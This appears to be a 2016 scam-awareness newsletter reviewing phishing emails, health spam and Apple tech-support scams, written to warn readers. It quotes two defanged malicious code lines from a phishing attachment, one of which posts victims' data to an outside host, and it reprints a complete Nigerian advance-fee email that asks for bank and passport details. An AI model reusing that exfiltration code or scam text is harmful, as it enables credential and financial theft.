Please support our effort by making a small donation. Thank you!

x

February 24, 2016

THE WEEK IN REVIEW

During the past week criminals have been pushing out lots of scams across all media. People have informed us of scams through Craigslist, Care.com, Facebook, Email and texting. Why does it seem impossible for our law enforcement, or the companies who own/host these services, to do anything to slow these daily threats? Here’s one small example that appeared on Facebook recently. A reader sent us this graphic of a “sponsored” ad suggesting that Sylvester Stylone had died. Unfortunately, the TDS reader didn’t send the link for us to investigate. Therefore we 1-Facebook social engineeringcannot be certain what type of threat or scam this was but typically junk like this is just another social engineering trick to produce a click that results in a computer infection. Here are  two other scams that have appeared on Facebook and documented by the good folks at Sophos.com:

https://nakedsecurity.sophos.com/2015/09/21/guess-what-facebook-dislike-scams-are-back/

https://nakedsecurity.sophos.com/2015/06/11/watch-out-for-acai-berry-scams-on-facebook/

Dangerous social engineering tricks have been sharply on the rise. Visit our latest feature article titled “Social Engineering At Its Worst” 

Sample Scam Subject Lines:

Alert: Policy for Auto Warranty expired

Alert: Your Direct Deposit (business account)

Don’t Ignore This!!!

Ending Soon: Your Kohl’s $50 gift

Get The Facts On cancer-Treatment

High Blood Sugar Secret Discovered (Medical Breakthrough)

How Millions of Homeowners are Lowering Their Payments

How to Protect Your Pets For illness And Injury Low – cost Animal Insurance

School of Trades Gunsmithing–Schools

See The Grand Canyon—By helicopter

You And I Were Never Meant To See This

Your Offer Expires Tonight!

Your Sam’s Club $50 voucher

Sample Scam Email Addresses:

AcceleratedTeachingCertification@faimpic.download

AutoInsuranceUpdate@mtako.tfutile.top

BeverlyHillsM.D.@1kinz.top

CreditCardOffers@retrademl.download

Diabetes_Video@bhuka.adoreda.top

Dr.Trim@1cato.top

EmergencyPlumbing@simplefiles.top

HealthTips@townstral.top

Heart-Attack-Prevention@hygf.tenearu.top

JenniferLopezRadiantComplexion@vcjk.ogvalued.top

OnlineBackgroundCheck@nonindividualistic-com.top

PsoriasisMiracle@ljnov.download

TaxProgramsOnline@stereochromatically-com.top

 

 

 

Phish NETS: Multiple Apple Attacks!

Criminals have been heavily targeting Apple account holders. We found several different phishing attacks and, if you read our “For Your Safety” column below, you’ll also see several phony Apple computer tech support scams.

Look closely at these first two phishing emails and you’ll see that they don’t come from Apple.com even though the sender appears to be “Apple Support.” The first email is actually sent from verification@support.com and the second is from verification@up.com. “Dear Customer, we’ve detected a slight error regarding your GSX.” And “New API info for your account.” Criminals often target GSX Apple accounts (Apple Global Service Exchange) which are special accounts offered to licensed Apple technicians around the world. The attached file “form_attached.shtml” is a web document and very dangerous to open. We found two lines of code in the document connecting to very suspicious domains that are not owned by Apple Computer:

  1. This disabled line of code is executing a javascript located on a hacked medical web site: <script language=”JavaScript” src=”xxxx://statcorpmedical.com/avactis-themes/system/js/gen_validatorv4.js” type=”text/javascript” xml space=”preserve”></script>
  2. This disabled line of code is posting all the phished information given up by the victim to a strange website called 123qzz.net. This website displays a lot of Chinese characters on the front page. <form id=”form1″ name=”form1″ action=”xxxx://123qzz.net/ok.php” method=”post” onSubmit=” return submitOnce(event); setFDC()”>

Just delete!

2-Phish-Apple Support news alert

3-Phish-AppleSupport

Then there was this weird Apple phishing email that begins with… “Information about you! Please take a moment and help us in order to continue your service.” A mouse-over of the link “continue” points to a website called nfloridahook.com, a fish restaurant’s website that was hacked. You’ll see below that VirusTotal.com reports the Security Service Fortinet has identified this domain and link as a phishing site.

Delete!

4-Phish-Apple-Information about you

5-Phish-Apple-Information about you2

Your Money: Brake Repairs, Get Moving Quotes, Home Warranty Insurance, and Quality Used Cars

Just because a solicitation looks sophisticated and well-crafted, doesn’t mean it is legitimate on the Internet. Take these examples. In the first we’re told we can find “Brake Repairs For Less with Coupons.” The email comes from autorepaircoupons@bestrepair.click. It sounds and looks so legitimate on the surface. But let’s dig a bit deeper… A WHOIS look up shows that the domain bestrepair.click was registered within minutes of the email being sent out. A screen shot of the website captured for the WHOIS registration seems to show YouTube.   What about the “unsubscribe” text at the bottom for a company called AVP Digital Media in New York? We can’t find any website for this business using Google but we found information identifying a business of that name in Bhopal, India. Also, we see that AVP Digital Media owns a variety of odd domains, some related to other scams such as the next image of the email offering help finding home movers as well as the email below for “Quality Used Cars.” All three domains were registered with Alpnames by someone named “Nitin Sharma.” A search for him and AVP Digital Media also link to businesses in India. And then there is that hidden random white text at the bottom of the email meant to fool antispam servers. Tricks like that don’t inspire confidence in the legitimacy of the email either.

6-Brake repairs for less with coupons

7-Get Moving Quotes

9-Find quality used cars

How about this email about “Home Warranty Insurance Plans” offering the first month free? It looks very professionally crafted as well and comes from HomeRepairGuard@homewaranty.date. (Notice the misspelling of “warranty?”) Of course the domain homewaranty.date was registered on February 16 through Alpnames by Raj Singh from Airtel Enterprise. We just wrote about Mr. Singh, Airtel Enterprise and “Free Bird Research” in our Top Story last week regarding student loan payoff scams.

Delete!

8-Home Warranty Insurance Plans

 

TOP STORY: Criminals Target Those With Health Problems

The top criminal gangs who are responsible for the majority of malicious emails against United States citizens often target people suffering with health related problems. And the most common health issue they target as a means to engineer a click is diabetes. We find their behavior even more despicable for preying upon those who are vulnerable because they may be looking for relief from their health problems.

Below is a list of the health-related issues that were found amongst 1000 malicious emails during a recent three day period from just one honey-pot email server:

Acid reflux

Alcohol addiction

Amphetamine abuse

ADHD

Alzheimers

Constipation

COPD and Pulmonary Diseases

Dental implants/Dentures

Diabetes

Drug rehabilitation

Fatigue

Gout

Heart problems

Heartburn

High blood pressure

Hypothyroidism

Incontinence

Low testosterone

Lung cancer

Melanoma

Multiple sclerosis

Osteoporosis

Overactive bladder

Pain/inflammation

Prostate cancer

Psoriasis

Rheumatoid arthritis

Stress

Stroke

Toe and Knee treatment options

Weight loss / Body weight

Here are three examples of these scam emails and the first appears to cite an article from “CBS Health News” with the headline “This ended my diabetes symptoms in days.” The email comes from, and has links to, the domain solutdiab.click. A simple WHOIS lookup of this domain reveals that the site was registered using Alpnames by someone named Rupali Gupta from Pune, India on the day the email was sent. The website is being hosted in Murcia, Spain. Here is some of the text hidden in the lower blue box at the bottom of the email:

/ask /augmenter /sicuro /sid /tas ks /feeds /sigh /Saving swe /namely /2501 /inspire /dalla /suffic ient /Reply /evaluation /uvm on /Med /saving /ration /old /saat /ISO /3042 Howells /general /Thank /multiplies /led /JENNIFER /second /lyngbyeae /d isastrous OK /XX /axhwjvf /regular /al /PermSize /3D3D128m /desto /beenBelleville /Iran James /verdriet /Moz /other /p arliamentarians /scroll

10-This ended my diabetes

This next email leads you to believe it can help you “treat your acid reflux.” It offers a link to a “free video that will reveal 1 unusual tip to quickly cure your acid reflux & enjoy permanent freedom from heartburn.” The domain certainly looks official: acidreflux.click.  Once again, a WHOIS reveals a great deal about this fraud. Check it out for yourself. The domain was registered the day the email was sent by someone named Amit from Indore, India. The website title is YouTube and it is being hosted on a webserver in Canterbury, England. Here is yet another scam pretending to represent an article from Harvard University, the “United States Journal of Medicine” and a study from NASA on how to cure diabetes in just 3 weeks (or 14 days!) It’s pretty bizarre…

11-Harvard article -cure diabetic decay

12-Treat your acid reflux

And finally, this email claims to connect those with COPD to leading lung and respiratory physicians. The email is represented by the domain bestsiteusa.top. By now you know the drill. A WHOIS lookup shows that the domain was registered the day the email was sent by someone listed only as “R R” from a company in Houston, Texas called “Digital Technical.” Google can’t find any such company in Houston, Texas or anywhere else. The WHOIS shows the phone number for Digital Technical as 2222222. Doesn’t this inspire medical confidence?

Delete!

13-COPD



FOR YOUR SAFETY: Apple Tech Support

When you think about tech support scam calls, most people think they target Windows users. (Read this article on these scams from Woody Leonard of the Windows Secrets Newsletter.) However, we’ve been seeing a rise in these scams targeting Apple Computer users and several months ago published a feature article about them here. This past week we had several TDS readers send us new Apple Mac Support tech scams.

This first one came as a popup in Safari and pointed to a domain called syscarewarning.info. The popup tries to convince the computer owner that there is a serious issue with his/her computer and to call the toll free number 855-908-3826.

14-Apple Tech Support Scam

Then came these two more sophisticated popups from another TDS reader. They try a different tact in the first popup saying “It appears that your computer and Internet browser have POP UP SOFTWARE enabled. Please call TOLL-FREE to DISABLE POP-UP AD SOFTWARE NOW: 866-405-2214.”

The popup scam is from a website identified as hh2m.com.

15-MacSupportScam

The next popup was from the domain windlap.net. Don’t be misled that it begins with the sub-domain apple.windlap.net. Anyone can create a subdomain that says anything. A subdomain always precedes the domain name. In this case, the popup urges the visitor to call 855-539-5528, and also provides live chat “tech support.”

16-MacSupportScam2

Obviously none of the domains in these tech support scams is apple.com. A WHOIS lookup of the three domains reveals precious little information and two of the three domains were registered through proxy services so we’ll never learn anything further. On the other hand, if you search Google for each of the first two phone numbers offered for tech support, you’ll see lots of links speaking about this scam, the malware related to it, and how to remove it.

https://www.google.com/?gws_rd=ssl#q=855-908-3826

https://www.google.com/?gws_rd=ssl#q=866-405-2214

The last phone number, 855-539-5528, actually has few links related to it from a Google search but it does include the scammer’s website at windlap.net. Don’t visit it! And never believe these popups! The most vulnerable population to these scams is the elderly and the young. Help educate them to avoid this nonsense.

ON THE LIGHTER SIDE: Payment to those impacted by Lottery Scams

Finally recompense! The Nigerian President himself has recognized the scams that have targeted Americans and he is going to make it right! All victims are entitled to compensation for the many Nigerian 419 scams we’ve suffered. Can’t wait to get our payout!

From:  admin@HULISA.COM
Time:   2016-02-17 21:26:21

Subject: IMMEDIATE RELEASE OF YOUR CONTRACT PAYMENT/INHERITANCE FUND/SCAM/LOTTERY VICTMS

The President,Federal Republic of Nigeria , Mr.Mohammadu Buhari(GCFR) and the Governor of Central Bank Of Nigeria , Mr.Godwin Emefiele in Conjunction with the Board Of Directors of the Central Bank of Nigeria held a meeting last week concerning contract payment release, both foreign and local contracts and some inheritance funds.

On going through contracts file, we discovered that your file was dumped untreated.At this juncture, we apologize for the delay of US$32,500,000.00(Thirty Two Million Five thousand United States Dollars Only)of your contract payment/Inheritance fund.To enable us to carry on the release of this fund to you,we advise you to stop communicating with any other office now to avoid jeopardising with your fund and attention to the appointed office below for you to receive your payment accordingly.

Now your new Payment Reference No.-35460021, Allocation No: 674632 Password No : 339331 , Pin Code No: 55674 and your Certificate of Merit Payment No : 103 , CBN Released Code No: 0763; Immediate Telex confirmation No: -1114433 ; Secret Code No: XXTN013, Having received these vital payment number.Therefore ,You are qualified now to received and confirm Your payment with the Federal Government of Nigeria through the appointed paying bank immediately and you will have this fund into your bank account within the next 24hrs .

Now you are directed to contact the Director of African Development Bank Group Mr.Douglas Benson immediately you receive this mail so that he will release your fund to you and fax you the payment Copy Slips and also you should reconfirm your Banking Details,Personal Informations for easy communications,Using the Secret Code No:(XXTN014), this is to avoid mistake while transferring your contract payment to you today .Ensure that you quote the Secret Code as:(XXTN014) while send your mail alongside with your informations to the paying bank as directed.

Contact Person: Mr.Douglas Benson(Director,International Remittance Department,Email:adbgbankplcadbg@rocketmail.com, Tel:+234-705-329-4014.Contact him now and inform him that you received a message from the President Federal Republic Of Nigeria, Instructing you to contact him for immediate release of your contract payment and forward your Details to his office to avoid transfer mistake such as

Your Bank Name:
Your Bank Address:
Your Bank Account No:
Routing No:

Swift Code No:
Account Name:

Full Name:
Home Address:

Your Direct Tel,Mobile & Fax No:
Age & Occupation :

A Copy of International Passport/Driving Licence

NOTE : We have mounted our security network to monitor every in-coming calls and emails , if we still find out that you are still dealing with all those fraudsters,Impostors,Scammers that have been frustrating your life for years , I shall stop and cancel your payment immediately .

You have being approved to receive US$32,500,000.00 as your Contract/Inheritance payment from the African Development Bank Group.So,call Mr.Douglas Benson on his direct telephone number +234-8152460511 upon the receipt of the mail to confirm the mail to him very important.On behalf of the United Nations, I hereby extend my sincere invitation to you, to come and invest in any part of the World’s economy as soon as your fund is paid to you.

 

Best Regards

Mr.Mohammadu Buhari(GCFR)
PRESIDENT FEDERAL GOVERNMENT OF NIGERIA

 

Until next week, surf safely!